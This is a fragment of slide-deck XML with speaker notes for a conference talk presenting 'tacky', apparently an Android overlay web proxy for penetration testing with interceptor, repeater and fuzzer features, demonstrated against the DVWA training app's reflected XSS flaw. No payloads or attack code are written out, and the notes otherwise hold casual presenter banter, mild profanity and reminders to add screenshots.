                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATT 20 minutres</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- We just wanted to give a small shout out to facebook for showing us that overlays are possible, without them we probably would not have started to create tacky</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- we also want to say fuck you to facebook for seperating there messenger service into another application, seriously what where you guys thinking?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="Shape 34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7" name="Shape 347"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Shape 348"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SO as you can see on the screen the small image of cartman </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Shape 34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4" name="Shape 354"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Shape 355"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATT around 20 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- as you can see we have a full UI sitting overtop of our browser activity which does not interfere with the process and can easily be minimize.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Also adding a bit of translucency leaves our application visable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>so overlays definately open up a ton of possibilities when it comes to applications and have definately made our lives much easier</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Shape 35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1" name="Shape 361"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Shape 362"/>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CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>so no attack proxy would be complet if you can’t intercept and modify the requests on the fly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>of course that is in tacky, and the funny part is when a request is captured the little cartman image we showed in previous slides would becoming something like this, cartman beefs up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Shape 36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8" name="Shape 368"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Shape 369"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So this is how the interceptor looks like, as you can see since it’s translucent you can actually still see your app in the back, in this case the dvwa web page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in this case we are just targeting the reflected xss vulnerability in dvwa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and the bottoms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="Shape 37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4" name="Shape 374"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Shape 375"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SO as matthew previous mentioned, mobile keyboards are not as easy to use so we</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Shape 37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0" name="Shape 380"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="Shape 381"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>mention other quicklists</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="Shape 38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6" name="Shape 386"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Shape 387"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>add screen shot here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>screen shot of alert box showed up in the back</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="Shape 38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2" name="Shape 392"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Shape 393"/>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MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What would a proxy be without a repeater or a way to resend the same requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SO our repeater is just like any other </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Shape 39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CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>My name is Chris, I am actually from Taiwan. I wanted to speak in Mandarin but my friend here won’t understand a word so in this speak I will just stick to English. However feel free to talk to me afterwards in Mandarin if you like. I currently work in Tokyo as a security engineer, and i mostly do penetration test for a living.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Shape 12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9" name="Shape 399"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Shape 400"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>on the right we have the original request and response,. On the left you can see the modified request with our special xss string and in turn the response.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Shape 40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6" name="Shape 406"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Shape 407"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>we added the webview as a way to visualize the attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Shape 40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2" name="Shape 412"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Shape 413"/>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CHRIS 26 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>just like any other proxy, we also have fuzzing functionality. currently we only have the dumb fuzzer, where we don’t have any cool techniques in the back detecting if the web api is vulnerable or not, it all depends on you to check the response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>we have some built-in fuzz list, currently adpated from fuzzdb, but if you like you can always include your own custom fuzzing list with this fuzzer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Shape 41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9" name="Shape 419"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Shape 420"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4343400" x="685800"/>
            <a:ext cy="4114800" cx="5486399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CHRIS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Shape 42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6" name="Shape 426"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="Shape 427"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CHRIS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Shape 42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3" name="Shape 433"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Shape 434"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CHRIS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Shape 43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9" name="Shape 439"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Shape 440"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4343400" x="685800"/>
            <a:ext cy="4114800" cx="5486399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CHRIS 30 minutes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Shape 44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5" name="Shape 445"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Shape 446"/>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CHRIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>MATT: control the device</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Shape 44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1" name="Shape 451"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="452" name="Shape 452"/>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MATT 27 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>I still dont understand java, so fuck java, but android is in java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>and i love android so i was forced to learn java, but still fuck java</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="Shape 45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7" name="Shape 457"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Shape 458"/>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lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CHRIS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Shape 45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5" name="Shape 125"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Shape 126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4343400" x="685800"/>
            <a:ext cy="4114800" cx="5486399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hello everyone, my names matt and I’m sure many of you are thinking I’ve never heard of this guy </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Shape 12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4" name="Shape 464"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Shape 465"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>althought we know it’s summer here, but if anybody wanna touch my android please come over to the stage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Shape 46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0" name="Shape 470"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
